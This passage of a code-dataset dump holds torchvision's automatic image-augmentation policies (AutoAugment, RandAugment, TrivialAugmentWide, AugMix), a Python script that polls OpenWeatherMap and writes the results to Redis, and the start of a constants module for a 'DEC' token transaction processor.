(torch.arange(num_bins) / ((num_bins - 1) / 4))).round().int(),\n False,\n ),\n \"Solarize\": (lambda num_bins, height, width: torch.linspace(1.0, 0.0, num_bins), False),\n \"AutoContrast\": (lambda num_bins, height, width: None, False),\n \"Equalize\": (lambda num_bins, height, width: None, False),\n \"Invert\": (lambda num_bins, height, width: None, False),\n }\n\n def __init__(\n self,\n policy: AutoAugmentPolicy = AutoAugmentPolicy.IMAGENET,\n interpolation: InterpolationMode = InterpolationMode.NEAREST,\n fill: Union[features.FillType, Dict[Type, features.FillType]] = None,\n ) -> None:\n super().__init__(interpolation=interpolation, fill=fill)\n self.policy = policy\n self._policies = self._get_policies(policy)\n\n def _get_policies(\n self, policy: AutoAugmentPolicy\n ) -> List[Tuple[Tuple[str, float, Optional[int]], Tuple[str, float, Optional[int]]]]:\n if policy == AutoAugmentPolicy.IMAGENET:\n return [\n ((\"Posterize\", 0.4, 8), (\"Rotate\", 0.6, 9)),\n ((\"Solarize\", 0.6, 5), (\"AutoContrast\", 0.6, None)),\n ((\"Equalize\", 0.8, None), (\"Equalize\", 0.6, None)),\n ((\"Posterize\", 0.6, 7), (\"Posterize\", 0.6, 6)),\n ((\"Equalize\", 0.4, None), (\"Solarize\", 0.2, 4)),\n ((\"Equalize\", 0.4, None), (\"Rotate\", 0.8, 8)),\n ((\"Solarize\", 0.6, 3), (\"Equalize\", 0.6, None)),\n ((\"Posterize\", 0.8, 5), (\"Equalize\", 1.0, None)),\n ((\"Rotate\", 0.2, 3), (\"Solarize\", 0.6, 8)),\n ((\"Equalize\", 0.6, None), (\"Posterize\", 0.4, 6)),\n ((\"Rotate\", 0.8, 8), (\"Color\", 0.4, 0)),\n ((\"Rotate\", 0.4, 9), (\"Equalize\", 0.6, None)),\n ((\"Equalize\", 0.0, None), (\"Equalize\", 0.8, None)),\n ((\"Invert\", 0.6, None), (\"Equalize\", 1.0, None)),\n ((\"Color\", 0.6, 4), (\"Contrast\", 1.0, 8)),\n ((\"Rotate\", 0.8, 8), (\"Color\", 1.0, 2)),\n ((\"Color\", 0.8, 8), (\"Solarize\", 0.8, 7)),\n ((\"Sharpness\", 0.4, 7), (\"Invert\", 0.6, None)),\n ((\"ShearX\", 0.6, 5), (\"Equalize\", 1.0, None)),\n ((\"Color\", 0.4, 0), (\"Equalize\", 0.6, None)),\n ((\"Equalize\", 0.4, None), (\"Solarize\", 0.2, 4)),\n ((\"Solarize\", 0.6, 5), (\"AutoContrast\", 0.6, 
None)),\n ((\"Invert\", 0.6, None), (\"Equalize\", 1.0, None)),\n ((\"Color\", 0.6, 4), (\"Contrast\", 1.0, 8)),\n ((\"Equalize\", 0.8, None), (\"Equalize\", 0.6, None)),\n ]\n elif policy == AutoAugmentPolicy.CIFAR10:\n return [\n ((\"Invert\", 0.1, None), (\"Contrast\", 0.2, 6)),\n ((\"Rotate\", 0.7, 2), (\"TranslateX\", 0.3, 9)),\n ((\"Sharpness\", 0.8, 1), (\"Sharpness\", 0.9, 3)),\n ((\"ShearY\", 0.5, 8), (\"TranslateY\", 0.7, 9)),\n ((\"AutoContrast\", 0.5, None), (\"Equalize\", 0.9, None)),\n ((\"ShearY\", 0.2, 7), (\"Posterize\", 0.3, 7)),\n ((\"Color\", 0.4, 3), (\"Brightness\", 0.6, 7)),\n ((\"Sharpness\", 0.3, 9), (\"Brightness\", 0.7, 9)),\n ((\"Equalize\", 0.6, None), (\"Equalize\", 0.5, None)),\n ((\"Contrast\", 0.6, 7), (\"Sharpness\", 0.6, 5)),\n ((\"Color\", 0.7, 7), (\"TranslateX\", 0.5, 8)),\n ((\"Equalize\", 0.3, None), (\"AutoContrast\", 0.4, None)),\n ((\"TranslateY\", 0.4, 3), (\"Sharpness\", 0.2, 6)),\n ((\"Brightness\", 0.9, 6), (\"Color\", 0.2, 8)),\n ((\"Solarize\", 0.5, 2), (\"Invert\", 0.0, None)),\n ((\"Equalize\", 0.2, None), (\"AutoContrast\", 0.6, None)),\n ((\"Equalize\", 0.2, None), (\"Equalize\", 0.6, None)),\n ((\"Color\", 0.9, 9), (\"Equalize\", 0.6, None)),\n ((\"AutoContrast\", 0.8, None), (\"Solarize\", 0.2, 8)),\n ((\"Brightness\", 0.1, 3), (\"Color\", 0.7, 0)),\n ((\"Solarize\", 0.4, 5), (\"AutoContrast\", 0.9, None)),\n ((\"TranslateY\", 0.9, 9), (\"TranslateY\", 0.7, 9)),\n ((\"AutoContrast\", 0.9, None), (\"Solarize\", 0.8, 3)),\n ((\"Equalize\", 0.8, None), (\"Invert\", 0.1, None)),\n ((\"TranslateY\", 0.7, 9), (\"AutoContrast\", 0.9, None)),\n ]\n elif policy == AutoAugmentPolicy.SVHN:\n return [\n ((\"ShearX\", 0.9, 4), (\"Invert\", 0.2, None)),\n ((\"ShearY\", 0.9, 8), (\"Invert\", 0.7, None)),\n ((\"Equalize\", 0.6, None), (\"Solarize\", 0.6, 6)),\n ((\"Invert\", 0.9, None), (\"Equalize\", 0.6, None)),\n ((\"Equalize\", 0.6, None), (\"Rotate\", 0.9, 3)),\n ((\"ShearX\", 0.9, 4), (\"AutoContrast\", 0.8, None)),\n ((\"ShearY\", 0.9, 8), (\"Invert\", 0.4, None)),\n ((\"ShearY\", 0.9, 5), (\"Solarize\", 0.2, 6)),\n ((\"Invert\", 0.9, None), (\"AutoContrast\", 0.8, None)),\n ((\"Equalize\", 0.6, None), (\"Rotate\", 0.9, 3)),\n ((\"ShearX\", 0.9, 4), (\"Solarize\", 0.3, 3)),\n ((\"ShearY\", 0.8, 8), (\"Invert\", 0.7, None)),\n ((\"Equalize\", 0.9, None), (\"TranslateY\", 0.6, 6)),\n ((\"Invert\", 0.9, None), (\"Equalize\", 0.6, None)),\n ((\"Contrast\", 0.3, 3), (\"Rotate\", 0.8, 4)),\n ((\"Invert\", 0.8, None), (\"TranslateY\", 0.0, 2)),\n ((\"ShearY\", 0.7, 6), (\"Solarize\", 0.4, 8)),\n ((\"Invert\", 0.6, None), (\"Rotate\", 0.8, 4)),\n ((\"ShearY\", 0.3, 7), (\"TranslateX\", 0.9, 3)),\n ((\"ShearX\", 0.1, 6), (\"Invert\", 0.6, None)),\n ((\"Solarize\", 0.7, 2), (\"TranslateY\", 0.6, 7)),\n ((\"ShearY\", 0.8, 4), (\"Invert\", 0.8, None)),\n ((\"ShearX\", 0.7, 9), (\"TranslateY\", 0.8, 3)),\n ((\"ShearY\", 0.8, 5), (\"AutoContrast\", 0.7, None)),\n ((\"ShearX\", 0.7, 2), (\"Invert\", 0.1, None)),\n ]\n else:\n raise ValueError(f\"The provided policy {policy} is not recognized.\")\n\n def forward(self, *inputs: Any) -> Any:\n flat_inputs_with_spec, image_or_video = self._flatten_and_extract_image_or_video(inputs)\n height, width = get_spatial_size(image_or_video)\n\n policy = self._policies[int(torch.randint(len(self._policies), ()))]\n\n for transform_id, probability, magnitude_idx in policy:\n if not torch.rand(()) <= probability:\n continue\n\n magnitudes_fn, signed = self._AUGMENTATION_SPACE[transform_id]\n\n magnitudes = magnitudes_fn(10, 
height, width)\n if magnitudes is not None:\n magnitude = float(magnitudes[magnitude_idx])\n if signed and torch.rand(()) <= 0.5:\n magnitude *= -1\n else:\n magnitude = 0.0\n\n image_or_video = self._apply_image_or_video_transform(\n image_or_video, transform_id, magnitude, interpolation=self.interpolation, fill=self.fill\n )\n\n return self._unflatten_and_insert_image_or_video(flat_inputs_with_spec, image_or_video)\n\n\nclass RandAugment(_AutoAugmentBase):\n _AUGMENTATION_SPACE = {\n \"Identity\": (lambda num_bins, height, width: None, False),\n \"ShearX\": (lambda num_bins, height, width: torch.linspace(0.0, 0.3, num_bins), True),\n \"ShearY\": (lambda num_bins, height, width: torch.linspace(0.0, 0.3, num_bins), True),\n \"TranslateX\": (\n lambda num_bins, height, width: torch.linspace(0.0, 150.0 / 331.0 * width, num_bins),\n True,\n ),\n \"TranslateY\": (\n lambda num_bins, height, width: torch.linspace(0.0, 150.0 / 331.0 * height, num_bins),\n True,\n ),\n \"Rotate\": (lambda num_bins, height, width: torch.linspace(0.0, 30.0, num_bins), True),\n \"Brightness\": (lambda num_bins, height, width: torch.linspace(0.0, 0.9, num_bins), True),\n \"Color\": (lambda num_bins, height, width: torch.linspace(0.0, 0.9, num_bins), True),\n \"Contrast\": (lambda num_bins, height, width: torch.linspace(0.0, 0.9, num_bins), True),\n \"Sharpness\": (lambda num_bins, height, width: torch.linspace(0.0, 0.9, num_bins), True),\n \"Posterize\": (\n lambda num_bins, height, width: (8 - (torch.arange(num_bins) / ((num_bins - 1) / 4))).round().int(),\n False,\n ),\n \"Solarize\": (lambda num_bins, height, width: torch.linspace(1.0, 0.0, num_bins), False),\n \"AutoContrast\": (lambda num_bins, height, width: None, False),\n \"Equalize\": (lambda num_bins, height, width: None, False),\n }\n\n def __init__(\n self,\n num_ops: int = 2,\n magnitude: int = 9,\n num_magnitude_bins: int = 31,\n interpolation: InterpolationMode = InterpolationMode.NEAREST,\n fill: Union[features.FillType, Dict[Type, features.FillType]] = None,\n ) -> None:\n super().__init__(interpolation=interpolation, fill=fill)\n self.num_ops = num_ops\n self.magnitude = magnitude\n self.num_magnitude_bins = num_magnitude_bins\n\n def forward(self, *inputs: Any) -> Any:\n flat_inputs_with_spec, image_or_video = self._flatten_and_extract_image_or_video(inputs)\n height, width = get_spatial_size(image_or_video)\n\n for _ in range(self.num_ops):\n transform_id, (magnitudes_fn, signed) = self._get_random_item(self._AUGMENTATION_SPACE)\n magnitudes = magnitudes_fn(self.num_magnitude_bins, height, width)\n if magnitudes is not None:\n magnitude = float(magnitudes[self.magnitude])\n if signed and torch.rand(()) <= 0.5:\n magnitude *= -1\n else:\n magnitude = 0.0\n image_or_video = self._apply_image_or_video_transform(\n image_or_video, transform_id, magnitude, interpolation=self.interpolation, fill=self.fill\n )\n\n return self._unflatten_and_insert_image_or_video(flat_inputs_with_spec, image_or_video)\n\n\nclass TrivialAugmentWide(_AutoAugmentBase):\n _AUGMENTATION_SPACE = {\n \"Identity\": (lambda num_bins, height, width: None, False),\n \"ShearX\": (lambda num_bins, height, width: torch.linspace(0.0, 0.99, num_bins), True),\n \"ShearY\": (lambda num_bins, height, width: torch.linspace(0.0, 0.99, num_bins), True),\n \"TranslateX\": (lambda num_bins, height, width: torch.linspace(0.0, 32.0, num_bins), True),\n \"TranslateY\": (lambda num_bins, height, width: torch.linspace(0.0, 32.0, num_bins), True),\n \"Rotate\": (lambda num_bins, height, width: 
torch.linspace(0.0, 135.0, num_bins), True),\n \"Brightness\": (lambda num_bins, height, width: torch.linspace(0.0, 0.99, num_bins), True),\n \"Color\": (lambda num_bins, height, width: torch.linspace(0.0, 0.99, num_bins), True),\n \"Contrast\": (lambda num_bins, height, width: torch.linspace(0.0, 0.99, num_bins), True),\n \"Sharpness\": (lambda num_bins, height, width: torch.linspace(0.0, 0.99, num_bins), True),\n \"Posterize\": (\n lambda num_bins, height, width: (8 - (torch.arange(num_bins) / ((num_bins - 1) / 6))).round().int(),\n False,\n ),\n \"Solarize\": (lambda num_bins, height, width: torch.linspace(1.0, 0.0, num_bins), False),\n \"AutoContrast\": (lambda num_bins, height, width: None, False),\n \"Equalize\": (lambda num_bins, height, width: None, False),\n }\n\n def __init__(\n self,\n num_magnitude_bins: int = 31,\n interpolation: InterpolationMode = InterpolationMode.NEAREST,\n fill: Union[features.FillType, Dict[Type, features.FillType]] = None,\n ):\n super().__init__(interpolation=interpolation, fill=fill)\n self.num_magnitude_bins = num_magnitude_bins\n\n def forward(self, *inputs: Any) -> Any:\n flat_inputs_with_spec, image_or_video = self._flatten_and_extract_image_or_video(inputs)\n height, width = get_spatial_size(image_or_video)\n\n transform_id, (magnitudes_fn, signed) = self._get_random_item(self._AUGMENTATION_SPACE)\n\n magnitudes = magnitudes_fn(self.num_magnitude_bins, height, width)\n if magnitudes is not None:\n magnitude = float(magnitudes[int(torch.randint(self.num_magnitude_bins, ()))])\n if signed and torch.rand(()) <= 0.5:\n magnitude *= -1\n else:\n magnitude = 0.0\n\n image_or_video = self._apply_image_or_video_transform(\n image_or_video, transform_id, magnitude, interpolation=self.interpolation, fill=self.fill\n )\n return self._unflatten_and_insert_image_or_video(flat_inputs_with_spec, image_or_video)\n\n\nclass AugMix(_AutoAugmentBase):\n _PARTIAL_AUGMENTATION_SPACE = {\n \"ShearX\": (lambda num_bins, height, width: torch.linspace(0.0, 0.3, num_bins), True),\n \"ShearY\": (lambda num_bins, height, width: torch.linspace(0.0, 0.3, num_bins), True),\n \"TranslateX\": (lambda num_bins, height, width: torch.linspace(0.0, width / 3.0, num_bins), True),\n \"TranslateY\": (lambda num_bins, height, width: torch.linspace(0.0, height / 3.0, num_bins), True),\n \"Rotate\": (lambda num_bins, height, width: torch.linspace(0.0, 30.0, num_bins), True),\n \"Posterize\": (\n lambda num_bins, height, width: (4 - (torch.arange(num_bins) / ((num_bins - 1) / 4))).round().int(),\n False,\n ),\n \"Solarize\": (lambda num_bins, height, width: torch.linspace(1.0, 0.0, num_bins), False),\n \"AutoContrast\": (lambda num_bins, height, width: None, False),\n \"Equalize\": (lambda num_bins, height, width: None, False),\n }\n _AUGMENTATION_SPACE: Dict[str, Tuple[Callable[[int, int, int], Optional[torch.Tensor]], bool]] = {\n **_PARTIAL_AUGMENTATION_SPACE,\n \"Brightness\": (lambda num_bins, height, width: torch.linspace(0.0, 0.9, num_bins), True),\n \"Color\": (lambda num_bins, height, width: torch.linspace(0.0, 0.9, num_bins), True),\n \"Contrast\": (lambda num_bins, height, width: torch.linspace(0.0, 0.9, num_bins), True),\n \"Sharpness\": (lambda num_bins, height, width: torch.linspace(0.0, 0.9, num_bins), True),\n }\n\n def __init__(\n self,\n severity: int = 3,\n mixture_width: int = 3,\n chain_depth: int = -1,\n alpha: float = 1.0,\n all_ops: bool = True,\n interpolation: InterpolationMode = InterpolationMode.BILINEAR,\n fill: Union[features.FillType, Dict[Type, 
features.FillType]] = None,\n ) -> None:\n super().__init__(interpolation=interpolation, fill=fill)\n self._PARAMETER_MAX = 10\n if not (1 <= severity <= self._PARAMETER_MAX):\n raise ValueError(f\"The severity must be between [1, {self._PARAMETER_MAX}]. Got {severity} instead.\")\n self.severity = severity\n self.mixture_width = mixture_width\n self.chain_depth = chain_depth\n self.alpha = alpha\n self.all_ops = all_ops\n\n def _sample_dirichlet(self, params: torch.Tensor) -> torch.Tensor:\n # Must be on a separate method so that we can overwrite it in tests.\n return torch._sample_dirichlet(params)\n\n def forward(self, *inputs: Any) -> Any:\n flat_inputs_with_spec, orig_image_or_video = self._flatten_and_extract_image_or_video(inputs)\n height, width = get_spatial_size(orig_image_or_video)\n\n if isinstance(orig_image_or_video, torch.Tensor):\n image_or_video = orig_image_or_video\n else: # isinstance(inpt, PIL.Image.Image):\n image_or_video = F.pil_to_tensor(orig_image_or_video)\n\n augmentation_space = self._AUGMENTATION_SPACE if self.all_ops else self._PARTIAL_AUGMENTATION_SPACE\n\n orig_dims = list(image_or_video.shape)\n expected_ndim = 5 if isinstance(orig_image_or_video, features.Video) else 4\n batch = image_or_video.reshape([1] * max(expected_ndim - image_or_video.ndim, 0) + orig_dims)\n batch_dims = [batch.size(0)] + [1] * (batch.ndim - 1)\n\n # Sample the beta weights for combining the original and augmented image or video. To get Beta, we use a\n # Dirichlet with 2 parameters. The 1st column stores the weights of the original and the 2nd the ones of\n # augmented image or video.\n m = self._sample_dirichlet(\n torch.tensor([self.alpha, self.alpha], device=batch.device).expand(batch_dims[0], -1)\n )\n\n # Sample the mixing weights and combine them with the ones sampled from Beta for the augmented images or videos.\n combined_weights = self._sample_dirichlet(\n torch.tensor([self.alpha] * self.mixture_width, device=batch.device).expand(batch_dims[0], -1)\n ) * m[:, 1].reshape([batch_dims[0], -1])\n\n mix = m[:, 0].reshape(batch_dims) * batch\n for i in range(self.mixture_width):\n aug = batch\n depth = self.chain_depth if self.chain_depth > 0 else int(torch.randint(low=1, high=4, size=(1,)).item())\n for _ in range(depth):\n transform_id, (magnitudes_fn, signed) = self._get_random_item(augmentation_space)\n\n magnitudes = magnitudes_fn(self._PARAMETER_MAX, height, width)\n if magnitudes is not None:\n magnitude = float(magnitudes[int(torch.randint(self.severity, ()))])\n if signed and torch.rand(()) <= 0.5:\n magnitude *= -1\n else:\n magnitude = 0.0\n\n aug = self._apply_image_or_video_transform(\n aug, transform_id, magnitude, interpolation=self.interpolation, fill=self.fill\n )\n mix.add_(combined_weights[:, i].reshape(batch_dims) * aug)\n mix = mix.reshape(orig_dims).to(dtype=image_or_video.dtype)\n\n if isinstance(orig_image_or_video, (features.Image, features.Video)):\n mix = orig_image_or_video.wrap_like(orig_image_or_video, mix) # type: ignore[arg-type]\n elif isinstance(orig_image_or_video, PIL.Image.Image):\n mix = F.to_image_pil(mix)\n\n return self._unflatten_and_insert_image_or_video(flat_inputs_with_spec, mix)\n","repo_name":"gavrilenkoof/opencv_test","sub_path":"models/pytorch_vision_main/torchvision/prototype/transforms/_auto_augment.py","file_name":"_auto_augment.py","file_ext":"py","file_size_in_byte":25594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26141229608","text":"import sys\nfrom 
signal import signal, SIGQUIT, SIGINT, SIGTERM\nfrom time import sleep\n\nimport requests\nfrom defaultenv import env\nfrom redis import Redis\n\nimport weather\nfrom env_support import require_env\n\nCITY_ID_STHLM = 2673722\nCITY_ID_SOLNA = 2675397\nCITY_CURRENT_WEATHER_URL = (\n    \"https://api.openweathermap.org/data/2.5/weather?\"\n    \"id={id}&appid={key}&units=metric\"\n)\n\n\ndef quit_handler(signum, frame):\n    print()\n    print(\"Good bye\")\n    sys.exit(0)\n\n\nif __name__ == \"__main__\":\n    apiKey: str = require_env(env(\"API_KEY\"), \"API_KEY\")\n    period_sec: int = int(env(\"PERIOD_SEC\", -1))\n    redis_host: str = env(\"REDIS_HOST\", \"localhost\")\n    redis_port: int = int(env(\"REDIS_PORT\", 6379))\n    redis_db: int = int(env(\"REDIS_DB\", 0))\n\n    place_id = CITY_ID_SOLNA\n    url = CITY_CURRENT_WEATHER_URL.format(id=place_id, key=apiKey)\n\n    signal(SIGINT, quit_handler)\n    signal(SIGQUIT, quit_handler)\n    signal(SIGTERM, quit_handler)\n\n    print()\n    print(f\"Connecting to Redis at {redis_host}:{redis_port} (db={redis_db})...\")\n    redis = Redis(host=redis_host, port=redis_port, db=redis_db)\n    redis.ping()\n\n    if period_sec > 0:\n        print(\n            f\"Fetching weather data every {period_sec} seconds. Use Ctrl+C to quit...\\n\"\n        )\n\n    while True:\n        resp = requests.get(url)\n        resp.raise_for_status()\n\n        json = resp.json()\n        try:\n            state: weather.WeatherState = weather.from_api(json)\n            redis.hset(name=place_id, mapping=state)\n            print(weather.as_readable(state))\n        except Exception as e:\n            print(f\"Cannot parse following json:\\n{json}\", file=sys.stderr)\n            raise e\n\n        if period_sec > 0:\n            sleep(period_sec)\n        else:\n            break\n","repo_name":"meandnano/weatherbot","sub_path":"app/fetcher.py","file_name":"fetcher.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"31076005015","text":"import json\nimport time\nFAMILY_NAME =\"dec\"\nFAMILY_VERSION =\"1.0\"\n\nANY_EMISSION_KEY = \"_{}_EMISSION_KEY_\"\nDEC_EMISSION_KEY = \"_DEC_EMISSION_KEY_\"\nDEC_HEART_BEAT_KEY = \"_DEC_HEART_BEAT_\"\nDEC_ESIGNERS_KEY = \"_DEC_EMISSION_SIG_\"\nDEC_TRANS_KEY = \"_DEC_TRANS_{}\"\nDEC_TRANS_ID = \"tid\"\nDEC_NAME_DEF = \"DEC\"\nDEC_WALLET = 'accounts'\nDEC_WALLET_ALIAS = \"aliases\"\nDEC_INVOICE_DEF = \"INVOICE\"\n# objects groups\nDEC_TARGET_GRP = \"targets\"\nDEC_ROLE_GRP = \"roles\"\nDEC_WALLET_GRP = \"accounts\"\nDEC_EMISSION_GRP = \"emissions\"\nDEC_SYNONYMS_GRP = \"aliases\"\nDEC_SIMPLE_GRP = \"simple\"\n#\nDEC_ESIGNERS = \"signers\"\nDEC_ESIGNATURE = \"esign\"\nDEC_ESIGN_NUM = \"sign_num\"\nDEC_MSIGN_ST = \"signed\"\nDEC_HEART = \"HEARTBEAT\"\nDEC_TOTAL_SUM_DEF = 8589869056\nDEC_GRANULARITY_DEF = 7\nDEC_NОMINAL_DEF = 0.8\nDEC_NОMINAL_NAME_DEF = \"USD\"\nDEC_СORPORATE_SHARE_DEF = 10\nDEC_MINTING_SHARE_DEF = 80\nDEC_NBURN_DEF = 3\nDEC_FEE_DEF = 1\nAVAILABLE_TILL_DEF = 60*60*100\nDEC_WAIT_TO_DATE_DEF = 60*60*24*3\nDEC_MINT_PERIOD_DEF = 60*2\nDEC_HEART_BEAT_PERIOD_DEF = 60*3\nDEFAULT_DID = \"did:notary:30563010:000000000\"\nDEFAULT_GATE = \"this\"\nGATE_ADDR_ATTR = \"addr\"\nDEC_WALLET_LIMIT_DEF = 1000\nDEC_SPEND_PERIOD_DEF = 4\nDEC_TARGET_DEF = \"any target\"\nDEC_TARGET_INFO_DEF = \"empty target\"\nDEC_ROLE_DEF = \"def_role\"\nDEC_ADMIN_PUB_KEY_DEF = \"12345\"\nDEC_PASSKEY_DEF = \"passkey\"\nDEC_TSTAMP_FMT = \"%Y-%m-%d %H:%M:%S\"\n# DEC attributes\nDEC_NAME = \"name\" \nDEC_SYMBOL = \"symbol\" \nDEC_TOTAL_SUM = \"supply_total\" \nDEC_ADMIN_PUB_KEY = \"admin_pub_key\" \nDEC_WAIT_TO_DATE = \"wait_to_date\" \nDEC_GRANULARITY = 
\"granularity\" \nDEC_PASSKEY = \"passkey\" \nDEC_LINK = \"link\" \nDEC_NОMINAL = \"nominal\" \nDEC_NОMINAL_NAME = \"nominal_name\" \nDEC_СORPORATE_ACCOUNT = \"corporate_account\" \nDEC_CORP_ACC_ADDR = \"account\"\nDEC_CORP_SIGN_MIN = \"sign_min\"\nDEC_SIGN_MIN = \"sign_min\"\nDEC_MULTI_SIGNERS = \"signers_pub_key\"\nDEC_MINTING_SHARE = \"minting_share\" \nDEC_СORPORATE_SHARE = \"corporate_share\"\nDEC_EMISSION_INFO = \"emission\"\nDEC_SALE_SHARE = \"sale_share\" \nDEC_MINT_PARAM = \"mint_param\"\nDEC_MINT_COEF_UMAX = \"Umax\" \nDEC_MINT_COEF_B2 = \"B2\"\nDEC_MINT_COEF_T1 = \"T1\"\nDEC_MINT_PERIOD = \"mint_period\" \nDEC_NBURN = \"nBurn\" \nDEC_FEE = \"fee\"\nDEC_TMSTAMP = \"timestamp\"\nDEC_CREATE_TMSTAMP = \"create_timestamp\"\nDEC_MINT_TMSTAMP = \"mint_timestamp\"\nDEC_MINTING_TOTAL = \"mint_total\"\nDEC_MINTING_REST = \"mint_balance\"\nDEC_СORPORATE_TOTAL = \"foundation_total\"\nDEC_СORPORATE_REST = \"foundation_balance\" \nDEC_SALE_TOTAL = \"sale_total\"\nDEC_SALE_REST = \"sale_balance\" \nDEC_ASSET_TYPE = \"asset_type\"\nDEC_DID_VAL = \"did\" \nDEC_TARGET = \"target\"\nDEC_TARGET_ID = \"name\"\nDEC_TARGET_ADDR = \"addr\"\nDEC_TARGET_URL = \"url\" \nDEC_PROVEMENT_KEY = \"provement_key\" \nDEC_CUSTOMER_KEY = \"customer\"\nAVAILABLE_TILL = \"available_till\" \nDEC_CORPORATE_PUB_KEY = \"corporate_pub_key\"\nDEC_HEART_BEAT_PERIOD = \"heart_period\"\nDEC_HEART_BEAT_TOTAL = \"heart_total\"\nDEC_HEART_BEAT_CURR = \"heart_curr\"\nDEC_HEART_BEAT_PEERS = \"heart_peers\"\nDEC_LAST_HEART_TMSTAMP = \"last_heart_tstamp\"\nDEC_MINT_REWARD = \"mint_reward\"\nDEC_PUBKEY = \"dec_pubkey\"\nNOTARY_PUBKEY = \"notary_pubkey\"\nDEC_SIGNATURE = \"dec_sign\"\nDEC_EMITTER = \"emitter\"\nDEC_OWNER = \"owner\"\nDEC_NOTARY_KEY = \"notary_key\"\nDEC_NOTARY_REQ_SIGN = \"notary_req_sign\"\nDEC_CASHIN_TMSTAMP = \"cashin_timestamp\"\nDEC_CASHIN_AMOUNT = \"cashin_amount\"\nDEC_SPEND_TMSTAMP = \"spend_timestamp\"\nDEC_SPEND_PERIOD = \"spend_period\"\nDEC_WALLET_STATUS = \"status\"\nDEC_WALLET_ROLE = \"role\"\nDEC_WALLET_TOKEN = \"token\"\nDEC_WALLET_STATUS_ON = \"on\"\nDEC_WALLET_STATUS_OFF = \"off\"\nDEC_WALLET_ADDR = \"addr\"\nDEC_TARGET_INFO = \"target_info\"\nDEC_TARGET_PRICE = \"target_price\"\nDEC_WALLETS_OWNERS = \"owner_pub_key\"\nDEC_ROLE_TYPE = \"role_type\"\nDEC_HEADER_PAYLOAD = \"hpayload\" \nDEC_PAYLOAD = \"payload\" \nDEC_HEADER_SIGN = \"header_sign\"\nDEC_CMD_OPTS = \"opts\"\nDEC_TRANS_OPTS = \"topts\"\nDEC_CMD = 'Verb' \nDEC_CMD_ARG = 'Name' \nDEC_CMD_TO = 'To'\nDEC_CMD_TO_GRP = 'to_grp'\nDEC_CMD_VAL = 'Value' \nDEC_CMD_DIN = 'Din' \nDEC_CMD_DIN_EXT = 'DinExt' \nDEC_ALIAS_DIS = 'disable'\n\n\n#DEC_WALLET_DID = \"wallet_did\"\n# wallet properties\nDEC_WALLET_LIMIT = \"limit\"\nDEC_WALLET_SPEND_PERIOD = \"spend_period\"\n#\nDATTR_VAL = \"val\"\nDATTR_COMM = \"comm\"\nDATTR_INPUTS = 'data_inputs'\n# DEC TPROC operation\nDEC_EMISSION_OP = 'emission'\nDEC_WALLET_OP = 'account'\nDEC_WALLET_OPTS_OP = \"opts\"\nDEC_ROLE_OP = 'role'\nDEC_ROLES_OP = \"roles\"\nDEC_GOODS_OP = \"goods\"\nDEC_BIRTH_OP = 'birth'\nDEC_TOTAL_SUPPLY_OP = 'totalsupply'\nDEC_TOKEN_INFO_OP = 'tokeninfo'\nDEC_BURN_OP = 'burn'\nDEC_CHANGE_MINT_OP = 'changemint'\nDEC_DISTRIBUTE_OP = 'distribute'\nDEC_FAUCET_OP = 'faucet'\nDEC_TIPS_OP = 'tips'\nDEC_ALIAS_OP = 'alias'\n\n#\nDEC_MINT_OP = 'mint'\nDEC_HEART_BEAT_OP = 'heartbeat'\nDEC_SEAL_COUNT_OP = \"sealcount\"\n#\nDEC_BALANCE_OF_OP = \"balanceof\"\nDEC_SEND_OP = \"send\"\nDEC_PAY_OP = \"pay\"\nDEC_INVOICE_OP = \"invoice\"\nDEC_TARGET_OP = \"target\"\nDEC_BANK_LIST_OP = 
\"bank_list\"\nDEC_CORP_ACC_OP = \"corpaccount\"\nDEC_APPROVALS = \"approvals\"\nDEC_APPROVAL = \"approval\"\nDEC_NOTARY_REQ = \"notary_req\"\nDEC_NOTARY_APPROVE = \"notary_approve\"\n#\nDEC_CRT_OP = 'crt'\nDEC_SET_OP = 'set'\nDEC_UPD_OP = 'upd'\nDEC_INC_OP = 'inc'\nDEC_DEC_OP = 'dec'\nDEC_TRANS_OP = 'trans'\n\nVALID_VERBS = DEC_EMISSION_OP, DEC_WALLET_OP,DEC_ALIAS_OP, DEC_WALLET_OPTS_OP, DEC_BURN_OP, DEC_CHANGE_MINT_OP, DEC_FAUCET_OP, DEC_SEND_OP, DEC_PAY_OP, DEC_INVOICE_OP, DEC_TARGET_OP, DEC_ROLE_OP, DEC_MINT_OP, DEC_HEART_BEAT_OP, DEC_SET_OP, DEC_INC_OP, DEC_DEC_OP, DEC_TRANS_OP\nVALID_VERBS_WITH_TO = DEC_EMISSION_OP,DEC_TRANS_OP, DEC_FAUCET_OP, DEC_SEND_OP, DEC_PAY_OP, DEC_MINT_OP,DEC_TARGET_OP\nDEC_TYPES = DEC_NAME_DEF,DEC_INVOICE_DEF,DEC_WALLET,DEC_HEART,DEC_TARGET_GRP,DEC_ROLE_GRP,DEC_SYNONYMS_GRP\nMIN_VALUE = 0\nMAX_VALUE = 4294967295\n\nMAX_NAME_LENGTH = 20\n\nTARGET_VISIBLE_ATTR = DEC_TARGET_ID,DEC_TARGET_URL,DEC_TARGET_ADDR,DEC_TARGET_PRICE,DEC_TARGET_INFO,DEC_OWNER\nLONG_NAME_OPS = DEC_WALLET_OP,DEC_ALIAS_OP,DEC_WALLET_OPTS_OP,DEC_MINT_OP,DEC_SEND_OP,DEC_PAY_OP,DEC_TARGET_OP,DEC_INVOICE_OP,DEC_FAUCET_OP\nEMISSION_UNVISIBLE_ATTR = DEC_PASSKEY,DEC_ADMIN_PUB_KEY,DEC_CORPORATE_PUB_KEY\n\nDEC_PROTO_FILE_NM = \"/project/dgt/etc/dec/emission.json\"\nDEC_COMM_FILE_NM = \"/project/dgt/etc/dec/comment.json\" \nDEC_OPTS_PROTO_FILE_NM = \"/project/dgt/etc/dec/wallet_opts.json\"\nDEC_CORP_OPTS_PROTO_FILE_NM = \"/project/dgt/etc/dec/corp_wallet_opts.json\"\nDEC_ROLE_PROTO_FILE_NM = \"/project/dgt/etc/dec/role.json\"\nDEC_TARGET_PROTO_FILE_NM = \"/project/dgt/etc/dec/target.json\"\n\nDEC_PROTO = { \n \"COUNTRY_NAME\" : \"CA\", \n \"STATE_OR_PROVINCE_NAME\" : \"ONTARIO\", \n \"LOCALITY_NAME\" : \"BARRIE\", \n \"ORGANIZATION_NAME\" : \"YOUR ORGANIZATION NAME\" , \n \"COMMON_NAME\" : \"NODE SAMPLE\", \n \"DNS_NAME\" : 